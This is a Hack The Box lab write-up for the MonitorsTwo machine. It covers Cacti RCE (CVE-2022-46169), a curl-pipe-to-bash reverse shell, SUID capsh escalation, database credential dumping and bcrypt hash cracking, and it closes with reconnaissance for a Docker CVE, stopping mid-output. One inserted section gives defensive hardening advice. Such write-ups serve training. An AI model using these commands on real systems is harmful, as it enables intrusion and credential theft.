
Hack The Box - MonitorsTwo

✍️ sckull

MonitorsTwo runs a vulnerable version of Cacti that let us get into a Docker container, where we escalated privileges with the capsh command; inside it we discovered the Cacti database credentials, which gave us access to a first user. We then escalated privileges on the host through a vulnerability in the installed Docker version.

Name: MonitorsTwo
OS: Linux
Points: 20
Difficulty: Easy
IP: 10.10.11.211
Maker: TheCyberGeek


Recon

nmap

nmap shows two open ports: ssh (22) and http (80).

# Nmap 7.93 scan initiated Sun Apr 30 17:02:10 2023 as: nmap -p22,80 -sV -sC -oN nmap_scan 10.129.79.180
Nmap scan report for 10.129.79.180
Host is up (0.15s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_  256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Login to Cacti
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 30 17:02:24 2023 -- 1 IP address (1 host up) scanned in 13.81 seconds

Web Site

Visiting the site shows the Cacti login panel, version 1.2.22.


Container User - www-data

We found that Cacti 1.2.22 is affected by a vulnerability that allows remote command execution, CVE-2022-46169, which is described in the post Cacti: Unauthenticated Remote Code Execution.

With the PoC we launched a reverse shell using shells.

 π CVE-2022-46169 main ❯ python3 CVE-2022-46169.py http://10.10.11.211/ -c 'curl 10.10.14.180:8000/10.10.14.180:1335|bash'
[*] Trying for 1 - 100 host ids

On the listener side we obtained a shell as www-data.

 π ~/htb/monitorstwo ❯ rlwrap nc -lvp 1335
listening on [any] 1335 ...
10.129.79.180: inverse host lookup failed: Unknown host
connect to [10.10.15.5] from (UNKNOWN) [10.129.79.180] 55506
can't access tty; job control turned off
$ whoami;id;pwd
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/var/www/html
$

Looking around the root directory we found that this is a Docker container, since the .dockerenv file exists.

$ ls -lah /
total 100K
drwxr-xr-x   1 root root 4.0K Mar 21 10:49 .
drwxr-xr-x   1 root root 4.0K Mar 21 10:49 ..
-rwxr-xr-x   1 root root    0 Mar 21 10:49 .dockerenv
drwxr-xr-x   1 root root 4.0K Mar 22 13:21 bin
drwxr-xr-x   2 root root 4.0K Mar 22 13:21 boot
drwxr-xr-x   5 root root  340 May  4 00:28 dev
-rw-r--r--   1 root root  648 Jan  5 11:37 entrypoint.sh
drwxr-xr-x   1 root root 4.0K Mar 21 10:49 etc
drwxr-xr-x   2 root root 4.0K Mar 22 13:21 home
drwxr-xr-x   1 root root 4.0K Nov 15 04:13 lib
drwxr-xr-x   2 root root 4.0K Mar 22 13:21 lib64
drwxr-xr-x   2 root root 4.0K Mar 22 13:21 media
drwxr-xr-x   2 root root 4.0K Mar 22 13:21 mnt
drwxr-xr-x   2 root root 4.0K Mar 22 13:21 opt
dr-xr-xr-x 289 root root    0 May  4 00:28 proc
drwx------   1 root root 4.0K Mar 21 10:50 root
drwxr-xr-x   1 root root 4.0K Nov 15 04:17 run
drwxr-xr-x   1 root root 4.0K Jan  9 09:30 sbin
drwxr-xr-x   2 root root 4.0K Mar 22 13:21 srv
dr-xr-xr-x  13 root root    0 May  4 00:28 sys
drwxrwxrwt   1 root root  20K May  4 00:51 tmp
drwxr-xr-x   1 root root 4.0K Nov 14 00:00 usr
drwxr-xr-x   1 root root 4.0K Nov 15 04:13 var
$

Container Privesc - Root

After searching for files with the SUID bit set we found capsh; GTFOBins gave us the way to escalate privileges with it.

$ find / -perm -4000 2>/dev/null
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/sbin/capsh
/bin/mount
/bin/umount
/bin/su
$ capsh --gid=0 --uid=0 --
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

Cacti DB

In the root directory we also found the entrypoint.sh file, which contains the credentials for the Cacti database.

cat entrypoint.sh
#!/bin/bash
set -ex

wait-for-it db:3306 -t 300 -- echo "database is connected"
if [[ ! $(mysql --host=db --user=root --password=root cacti -e "show tables") =~ "automation_devices" ]]; then
    mysql --host=db --user=root --password=root cacti < /var/www/html/cacti.sql
    mysql --host=db --user=root --password=root cacti -e "UPDATE user_auth SET must_change_password='' WHERE username = 'admin'"
    mysql --host=db --user=root --password=root cacti -e "SET GLOBAL time_zone = 'UTC'"
fi

chown www-data:www-data -R /var/www/html
# first arg is `-f` or `--some-option`
if [ "${1#-}" != "$1" ]; then
	set -- apache2-foreground "$@"
fi

exec "$@"
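The entrypoint above passes the root password on every mysql command line, so it is readable by anyone who can read the script (as www-data could here) and visible in the process list while each command runs. The following is an added example, not the box's entrypoint.sh or Cacti's own code, of the pattern a hardened entrypoint would use instead: the password is read from a mounted secret file (Docker secrets appear under /run/secrets/; the path is a parameter here) and handed to the client through a mode-0600 --defaults-extra-file, so it never appears in argv. The function names and the sample secret value are constructed for the example.

```shell
#!/bin/sh
# Added example: keep the Cacti DB password out of the entrypoint and off argv.
# Assumes: POSIX sh, a secret mounted as a file (Docker secrets: /run/secrets/<name>),
# and a mysql client that honours --defaults-extra-file (MySQL and MariaDB do).
# Weak pattern from the box's entrypoint.sh (password in the script and in `ps`):
#   mysql --host=db --user=root --password=root cacti -e "show tables"

# Write a mode-0600 [client] config from a secret file.
# $1 = secret file, $2 = output config path, $3 = db host (default db), $4 = db user (default root)
write_mysql_client_conf() {
    secret_file=$1; out=$2; host=${3:-db}; user=${4:-root}
    if [ ! -r "$secret_file" ]; then
        echo "secret file not readable: $secret_file" >&2
        return 1
    fi
    password=$(cat "$secret_file")          # $(...) drops the trailing newline
    rm -f "$out"                            # never inherit a pre-existing loose mode
    # umask 077 in a subshell: the file is created owner read/write only
    ( umask 077; printf '[client]\nhost=%s\nuser=%s\npassword=%s\n' \
        "$host" "$user" "$password" > "$out" )
}

# Build the mysql invocation. Only the config path travels on the command line,
# so `ps`, shell history and log lines show no password.
# $1 = config path, $2 = database name
mysql_argv() {
    printf 'mysql --defaults-extra-file=%s %s' "$1" "$2"
}

# Stand-alone demo on a constructed secret (no real database needed).
demo_dir=$(mktemp -d)
printf 'constructed-example-password\n' > "$demo_dir/db_password"
write_mysql_client_conf "$demo_dir/db_password" "$demo_dir/client.cnf" db root
echo "config written with mode: $(ls -ld "$demo_dir/client.cnf" | cut -c1-10)"
echo "entrypoint would run: $(mysql_argv "$demo_dir/client.cnf" cacti) -e 'show tables'"
rm -rf "$demo_dir"
```

In a real entrypoint the config file belongs on a tmpfs such as /run, and every `mysql --host=db --user=root --password=root cacti ...` line becomes `mysql --defaults-extra-file=/run/cacti-db.cnf cacti ...`. Pairing this with a dedicated, least-privileged database user instead of root limits what the file is worth if it does leak.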

Using those credentials we listed the registered users and obtained the password hashes of the three of them.

mysql --host=db --user=root --password=root -e 'use cacti;select * from user_auth;'
id	username	password	realm	full_name	email_address	must_change_password	password_change	show_tree	show_list	show_preview	graph_settings	login_opts	policy_graphs	policy_trees	policy_hosts	policy_graph_templates	enabled	lastchange	lastlogin	password_history	locked	failed_attempts	lastfail	reset_perms
1	admin	$2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC	0	Jamie Thompson	admin@monitorstwo.htb		on	on	on	on	on	2	1	11	1	on	-1	-1	-1		0	0	663348655
3	guest	43e9a4ab75570f5b	0	Guest Account		on	on	on	on	on	3	1	1	1	1	1		-1	-1	-1	00	0
4	marcus	$2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C	0	Marcus Brune	marcus@monitorstwo.htb			on	on	on	on	1	1	11	1	on	-1	-1		on	0	0	2135691668
$

John - Crack the Hash

We ran John on the hashes and managed to crack one of them.

 π ~/htb/monitorstwo ❯ john --wordlist=$ROCK hash_marcus
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
funkymonkey      (?)
1g 0:00:01:12 DONE (2023-04-30 17:16) 0.01385g/s 118.2p/s 118.2c/s 118.2C/s 474747..coucou
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
 π ~/htb/monitorstwo ❯

User - Marcus

We tried logging in over SSH as marcus, obtaining a shell and the user.txt flag.

 π ~/htb/monitorstwo ❯ ssh marcus@10.129.79.180 # funkymonkey
The authenticity of host '10.129.79.180 (10.129.79.180)' can't be established.
ED25519 key fingerprint is SHA256:RoZ8jwEnGGByxNt04+A/cdluslAwhmiWqG3ebyZko+A.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.79.180' (ED25519) to the list of known hosts.
marcus@10.129.79.180's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-147-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun 30 Apr 2023 09:17:16 PM UTC

  System load:                      0.0
  Usage of /:                       63.1% of 6.73GB
  Memory usage:                     14%
  Swap usage:                       0%
  Processes:                        233
  Users logged in:                  0
  IPv4 address for br-60ea49c21773: 172.18.0.1
  IPv4 address for br-7c3b7c0d00b3: 172.19.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for eth0:            10.129.79.180
  IPv6 address for eth0:            dead:beef::250:56ff:fe96:bd15


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


You have mail.
Last login: Thu Mar 23 10:12:28 2023 from 10.10.14.40
marcus@monitorstwo:~$ whoami;id;pwd
marcus
uid=1000(marcus) gid=1000(marcus) groups=1000(marcus)
/home/marcus
marcus@monitorstwo:~$ ls
user.txt
marcus@monitorstwo:~$ cat user.txt
328209fe85317c7a89aa5fa60953ea8a
marcus@monitorstwo:~$

Privesc

While enumerating directories we found an email addressed to the user marcus that details several vulnerabilities that must be mitigated.

marcus@monitorstwo:/var$ ls -lah mail
total 12K
drwxrwsr-x  2 root mail 4.0K Mar 22 11:46 .
drwxr-xr-x 13 root root 4.0K Jan  9 10:03 ..
-rw-r--r--  1 root mail 1.8K Oct 18  2021 marcus
marcus@monitorstwo:/var$ cat mail/marcus
From: administrator@monitorstwo.htb
To: all@monitorstwo.htb
Subject: Security Bulletin - Three Vulnerabilities to be Aware Of

Dear all,

We would like to bring to your attention three vulnerabilities that have been recently discovered and should be addressed as soon as possible.

CVE-2021-33033: This vulnerability affects the Linux kernel before 5.11.14 and is related to the CIPSO and CALIPSO refcounting for the DOI definitions. Attackers can exploit this use-after-free issue to write arbitrary values. Please update your kernel to version 5.11.14 or later to address this vulnerability.

CVE-2020-25706: This cross-site scripting (XSS) vulnerability affects Cacti 1.2.13 and occurs due to improper escaping of error messages during template import previews in the xml_path field. This could allow an attacker to inject malicious code into the webpage, potentially resulting in the theft of sensitive data or session hijacking. Please upgrade to Cacti version 1.2.14 or later to address this vulnerability.

CVE-2021-41091: This vulnerability affects Moby, an open-source project created by Docker for software containerization. Attackers could exploit this vulnerability by traversing directory contents and executing programs on the data directory with insufficiently restricted permissions. The bug has been fixed in Moby (Docker Engine) version 20.10.9, and users should update to this version as soon as possible. Please note that running containers should be stopped and restarted for the permissions to be fixed.

We encourage you to take the necessary steps to address these vulnerabilities promptly to avoid any potential security breaches. If you have any questions or concerns, please do not hesitate to contact our IT department.

Best regards,

Administrator
CISO
Monitor Two
Security Team
marcus@monitorstwo:/var$

CVE-2021-41091

The most notable one is CVE-2021-41091, which mentions Docker version 20.10.9 as the fixed release, meaning earlier versions are vulnerable. Looking at the version installed on the machine, it is probably vulnerable.

marcus@monitorstwo:~$ docker --version
Docker version 20.10.5+dfsg1, build 55c4c88
marcus@monitorstwo:~$

We quote part of the explanation of CVE-2021-41091.

.. A bug was found in Moby (Docker Engine) where the data directory (typically /var/lib/docker) contained subdirectories with insufficiently restricted permissions, allowing otherwise unprivileged Linux users to traverse directory contents and execute programs. ..

It says that the Docker data directory /var/lib/docker may have insufficiently restricted permissions, which could allow low-privileged users to reach its contents and execute programs. However, when we look at this directory we find that we have no permissions on it at all.

marcus@monitorstwo:~$ ls -lah /var/lib/docker
ls: cannot open directory '/var/lib/docker': Permission denied
marcus@monitorstwo:~$ find /var/lib/docker/ -type d,f 2>/dev/null
/var/lib/docker/
marcus@monitorstwo:~$

If we look at the structure on a local machine, we see that we can even find information about the containers by looking at the containers/ folder.

┌──(root㉿kali)-[/var/lib/docker]
└─# ls -lah
total 52K
drwx--x--- 13 root root 4.0K May  3 21:00 .
drwxr-xr-x 74 root root 4.0K May  3 21:00 ..
drwx--x--x  4 root root 4.0K May  3 21:00 buildkit
drwx--x---  8 root root 4.0K May  3 21:04 containers
drwx------  3 root root 4.0K May  3 21:00 image
drwxr-x---  3 root root 4.0K May  3 21:00 network
drwx--x--- 16 root root 4.0K May  3 21:04 overlay2
drwx------  4 root root 4.0K May  3 21:00 plugins
drwx------  2 root root 4.0K May  3 21:00 runtimes
drwx------  2 root root 4.0K May  3 21:00 swarm
drwx------  2 root root 4.0K May  3 21:01 tmp
drwx------  2 root root 4.0K May  3 21:00 trust
drwx-----x  2 root root 4.0K May  3 21:00 volumes

┌──(root㉿kali)-[/var/lib/docker]
└─# ls -lah containers
total 32K
drwx--x---  8 root root 4.0K May  3 21:04 .
drwx--x--- 13 root root 4.0K May  3 21:00 ..
drwx--x---  4 root root 4.0K May  3 21:01 3d771b3e220ad3d2c4004ebfac7ffb1f37da0dba38b75d0f1e47c2b3d56abb71
drwx--x---  4 root root 4.0K May  3 21:02 60f34c8fc70c7450e38165b0b48d419c7b16fa2cb31c2c8edf8293475a04ec13
drwx--x---  4 root root 4.0K May  3 21:04 c6c33aefdaa77e33f0c81e4810d1073a3f31c13694eb3a1d31349e0d8837a219
drwx--x---  4 root root 4.0K May  3 21:05 e490db1d1e6fe026f815d0154d02309bc308d01d4c2e2d73251e1886ce67a168
drwx--x---  4 root root 4.0K May  3 21:02 ea96ae8ab58b7117b612dfff8aabe1cfd8075a210f1fc6e1b4d8f48a5900f119
drwx--x---  4 root root 4.0K May  3 21:01 f6ab86f78ecfcd108099b654cadc95a8a318eb7ea1196378d32382720a6d0a1d

┌──(root㉿kali)-[/var/lib/docker]
└─#

Just as we can see the contents locally, the layout is probably the same on the target machine; there, however, we need the container's full ID in order to reach the container's directory.

┌──(root㉿kali)-[/var/lib/docker/containers]
└─# ls -lah
total 32K
drwx--x---  8 root root 4.0K May  3 21:04 .
drwx--x--- 13 root root 4.0K May  3 21:00 ..
drwx--x---  4 root root 4.0K May  3 21:01 3d771b3e220ad3d2c4004ebfac7ffb1f37da0dba38b75d0f1e47c2b3d56abb71
drwx--x---  4 root root 4.0K May  3 21:02 60f34c8fc70c7450e38165b0b48d419c7b16fa2cb31c2c8edf8293475a04ec13
drwx--x---  4 root root 4.0K May  3 21:04 c6c33aefdaa77e33f0c81e4810d1073a3f31c13694eb3a1d31349e0d8837a219
drwx--x---  4 root root 4.0K May  3 21:05 e490db1d1e6fe026f815d0154d02309bc308d01d4c2e2d73251e1886ce67a168
drwx--x---  4 root root 4.0K May  3 21:02 ea96ae8ab58b7117b612dfff8aabe1cfd8075a210f1fc6e1b4d8f48a5900f119
drwx--x---  4 root root 4.0K May  3 21:01 f6ab86f78ecfcd108099b654cadc95a8a318eb7ea1196378d32382720a6d0a1d

┌──(root㉿kali)-[/var/lib/docker/containers]
└─# docker ps
CONTAINER ID   IMAGE     COMMAND     CREATED         STATUS         PORTS     NAMES
e490db1d1e6f   alpine    "/bin/sh"   6 minutes ago   Up 6 minutes             modest_mirzakhani

┌──(root㉿kali)-[/var/lib/docker/containers]
└─# cd e490db1d1e6f*

┌──(root㉿kali)-[/var/lib/docker/containers/e490db1d1e6fe026f815d0154d02309bc308d01d4c2e2d73251e1886ce67a168]
└─# ls -lah
total 48K
drwx--x--- 4 root root 4.0K May  3 21:05 .
drwx--x--- 8 root root 4.0K May  3 21:04 ..
drwx------ 2 root root 4.0K May  3 21:04 checkpoints
-rw------- 1 root root 2.6K May  3 21:05 config.v2.json
-rw-r----- 1 root root 6.7K May  3 21:05 e490db1d1e6fe026f815d0154d02309bc308d01d4c2e2d73251e1886ce67a168-json.log
-rw-r--r-- 1 root root 1.5K May  3 21:05 hostconfig.json
-rw-r--r-- 1 root root   13 May  3 21:04 hostname
-rw-r--r-- 1 root root  174 May  3 21:04 hosts
drwx--x--- 2 root root 4.0K May  3 21:04 mounts
-rw-r--r-- 1 root root   53 May  3 21:04 resolv.conf
-rw-r--r-- 1 root root   71 May  3 21:04 resolv.conf.hash

┌──(root㉿kali)-[/var/lib/docker/containers/e490db1d1e6fe026f815d0154d02309bc308d01d4c2e2d73251e1886ce67a168]
└─# ls -lah checkpoints
total 8.0K
drwx------ 2 root root 4.0K May  3 21:04 .
drwx--x--- 4 root root 4.0K May  3 21:05 ..

┌──(root㉿kali)-[/var/lib/docker/containers/e490db1d1e6fe026f815d0154d02309bc308d01d4c2e2d73251e1886ce67a168]
└─# ls -lah mounts
total 8.0K
drwx--x--- 2 root root 4.0K May  3 21:04 .
drwx--x--- 4 root root 4.0K May  3 21:05 ..

┌──(root㉿kali)-[/var/lib/docker/containers/e490db1d1e6fe026f815d0154d02309bc308d01d4c2e2d73251e1886ce67a168]
└─#

To gather information about the container we ran cdk inside it.

./cdk  eva --full
CDK (Container DucK)
CDK Version(GitCommit): d9ab55702036c28e793378cc47605e21206dfef1
Zero-dependency cloudnative k8s/docker/serverless penetration toolkit by cdxy & neargle
Find tutorial, configuration and use-case in https://github.com/cdk-team/CDK/

[  Information Gathering - System Info  ]
2023/05/02 01:05:58 current dir: /tmp
2023/05/02 01:05:58 current user: root uid: 0 gid: 0 home: /root
2023/05/02 01:05:58 hostname: 50bca5e748b0
2023/05/02 01:05:58 debian debian 11.5 kernel: 5.4.0-147-generic
2023/05/02 01:05:58 Setuid files found:
    /usr/bin/chfn
    /usr/bin/chsh
    /usr/bin/gpasswd
    /usr/bin/newgrp
    /usr/bin/passwd
    /sbin/capsh
    /bin/mount
    /bin/su
    /bin/umount

[  Information Gathering - Services  ]
2023/05/02 01:05:58 service found in process:
    14230   1   perl
2023/05/02 01:05:58 service found in process:
    14573   1   perl
2023/05/02 01:05:58 service found in process:
    32773   1   perl

[  Information Gathering - Commands and Capabilities  ]
2023/05/02 01:05:58 available commands:
    curl,wget,find,ps,php,apt,dpkg,apache2,mysql,capsh,mount,gcc,g++,make,base64,perl
2023/05/02 01:05:58 Capabilities hex of Caps(CapInh|CapPrm|CapEff|CapBnd|CapAmb):
    CapInh: 00000000a00425f9
    CapPrm: 00000000a00425f9
    CapEff: 00000000a00425f9
    CapBnd: 00000000a00425f9
    CapAmb: 0000000000000000
    Cap decode: 0x00000000a00425f9 = CAP_CHOWN,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_SETGID,CAP_SETUID,CAP_SETPCAP,CAP_NET_BIND_SERVICE,CAP_NET_RAW,CAP_SYS_CHROOT,CAP_AUDIT_WRITE,CAP_SETFCAP
[*] Maybe you can exploit the Capabilities below:

[  Information Gathering - Mounts  ]
0:62 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/4Z77R4WYM6X4BLW7GXAJOAA4SJ:/var/lib/docker/overlay2/l/Z4RNRWTZKMXNQJVSRJE4P2JYHH:/var/lib/docker/overlay2/l/CXAW6LQU6QOKNSSNURRN2X4JEH:/var/lib/docker/overlay2/l/YWNFANZGTHCUIML4WUIJ5XNBLJ:/var/lib/docker/overlay2/l/JWCZSRNDZSQFHPN75LVFZ7HI2O:/var/lib/docker/overlay2/l/DGNCSOTM6KEIXH4KZVTVQU2KC3:/var/lib/docker/overlay2/l/QHFZCDCLZ4G4OM2FLV6Y2O6WC6:/var/lib/docker/overlay2/l/K5DOR3JDWEJL62G4CATP62ONTO:/var/lib/docker/overlay2/l/FGHBJKAFBSAPJNSTCR6PFSQ7ER:/var/lib/docker/overlay2/l/PDO4KALS2ULFY6MGW73U6QRWSS:/var/lib/docker/overlay2/l/MGUNUZVTUDFYIRPLY5MR7KQ233:/var/lib/docker/overlay2/l/VNOOF2V3SPZEXZHUKR62IQBVM5:/var/lib/docker/overlay2/l/CDCPIX5CJTQCR4VYUUTK22RT7W:/var/lib/docker/overlay2/l/G4B75MXO7LXFSK4GCWDNLV6SAQ:/var/lib/docker/overlay2/l/FRHKWDF3YAXQ3LBLHIQGVNHGLF:/var/lib/docker/overlay2/l/ZDJ6SWVJF6EMHTTO3AHC3FH3LD:/var/lib/docker/overlay2/l/W2EMLMTMXN7ODPSLB2FTQFLWA3:/var/lib/docker/overlay2/l/QRABR2TMBNL577HC7DO7H2JRN2:/var/lib/docker/overlay2/l/7IGVGYP6R7SE3WFLYC3LOBPO4Z:/var/lib/docker/overlay2/l/67QPWIAFA4NXFNM6RN43EHUJ6Q,upperdir=/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/diff,workdir=/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/work,xino=off
0:65 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
0:66 / /dev rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:67 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
0:68 / /sys ro,nosuid,nodev,noexec,relatime - sysfs sysfs ro
0:69 / /sys/fs/cgroup rw,nosuid,nodev,noexec,relatime - tmpfs tmpfs rw,mode=755
0:31 /docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e /sys/fs/cgroup/systemd ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,xattr,name=systemd
0:34 /docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e /sys/fs/cgroup/cpuset ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,cpuset
0:35 /docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e /sys/fs/cgroup/devices ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,devices
0:36 /docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e /sys/fs/cgroup/hugetlb ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,hugetlb
0:37 /docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e /sys/fs/cgroup/pids ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,pids
0:38 /docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e /sys/fs/cgroup/perf_event ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,perf_event
0:39 /docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e /sys/fs/cgroup/cpu,cpuacct ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,cpu,cpuacct
0:40 /docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e /sys/fs/cgroup/blkio ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,blkio
0:41 /docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e /sys/fs/cgroup/net_cls,net_prio ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,net_cls,net_prio
0:42 /docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e /sys/fs/cgroup/memory ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,memory
0:43 /docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e /sys/fs/cgroup/freezer ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,freezer
0:44 /docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e /sys/fs/cgroup/rdma ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,rdma
0:64 / /dev/mqueue rw,nosuid,nodev,noexec,relatime - mqueue mqueue rw
8:2 /root/cacti/entrypoint.sh /entrypoint.sh rw,relatime - ext4 /dev/sda2 rw
8:2 /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/sda2 rw
8:2 /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/hostname /etc/hostname rw,relatime - ext4 /dev/sda2 rw
8:2 /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/hosts /etc/hosts rw,relatime - ext4 /dev/sda2 rw
0:63 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k
0:65 /bus /proc/bus ro,nosuid,nodev,noexec,relatime - proc proc rw
0:65 /fs /proc/fs ro,nosuid,nodev,noexec,relatime - proc proc rw
0:65 /irq /proc/irq ro,nosuid,nodev,noexec,relatime - proc proc rw
0:65 /sys /proc/sys ro,nosuid,nodev,noexec,relatime - proc proc rw
0:65 /sysrq-trigger /proc/sysrq-trigger ro,nosuid,nodev,noexec,relatime - proc proc rw
0:70 / /proc/acpi ro,relatime - tmpfs tmpfs ro
0:66 /null /proc/kcore rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:66 /null /proc/keys rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:66 /null /proc/timer_list rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:66 /null /proc/sched_debug rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:71 / /proc/scsi ro,relatime - tmpfs tmpfs ro
0:72 / /sys/firmware ro,relatime - tmpfs tmpfs ro

[  Information Gathering - Net Namespace  ]
    container net namespace isolated.

[  Information Gathering - Sysctl Variables  ]
2023/05/02 01:05:58 net.ipv4.conf.all.route_localnet = 0

[  Information Gathering - DNS-Based Service Discovery  ]
error when requesting coreDNS: lookup any.any.svc.cluster.local. on 127.0.0.11:53: server misbehaving
error when requesting coreDNS: lookup any.any.any.svc.cluster.local. on 127.0.0.11:53: server misbehaving

[  Discovery - K8s API Server  ]
2023/05/02 01:05:58 checking if api-server allows system:anonymous request.
err found while searching local K8s apiserver addr.:
err: cannot find kubernetes api host in ENV
    api-server forbids anonymous request.
    response:

[  Discovery - K8s Service Account  ]
load K8s service account token error.:
open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory

[  Discovery - Cloud Provider Metadata API  ]
2023/05/02 01:05:59 failed to dial Alibaba Cloud API.
2023/05/02 01:06:00 failed to dial Azure API.
2023/05/02 01:06:01 failed to dial Google Cloud API.
2023/05/02 01:06:02 failed to dial Tencent Cloud API.
2023/05/02 01:06:03 failed to dial OpenStack API.
2023/05/02 01:06:04 failed to dial Amazon Web Services (AWS) API.
2023/05/02 01:06:05 failed to dial ucloud API.

[  Exploit Pre - Kernel Exploits  ]
2023/05/02 01:06:05 refer: https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2021-27365] linux-iscsi

   Details: https://blog.grimm-co.com/2021/03/new-old-bugs-in-linux-kernel.html
   Exposure: less probable
   Tags: RHEL=8
   Download URL: https://codeload.github.com/grimm-co/NotQuite0DayFriday/zip/trunk
   Comments: CONFIG_SLAB_FREELIST_HARDENED must not be enabled

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded



[  Information Gathering - Sensitive Files  ]
    .dockerenv - /.dockerenv
    /.bashrc - /etc/skel/.bashrc
    /.bash_history - /root/.bash_history
    /.bashrc - /root/.bashrc

[  Information Gathering - ASLR  ]
2023/05/02 01:06:07 /proc/sys/kernel/randomize_va_space file content: 2
2023/05/02 01:06:07 ASLR is enabled.

[  Information Gathering - Cgroups  ]
2023/05/02 01:06:07 /proc/1/cgroup file content:
    12:rdma:/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
    11:freezer:/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
    10:memory:/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
    9:net_cls,net_prio:/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
    8:blkio:/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
    7:cpu,cpuacct:/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
    6:perf_event:/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
    5:pids:/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
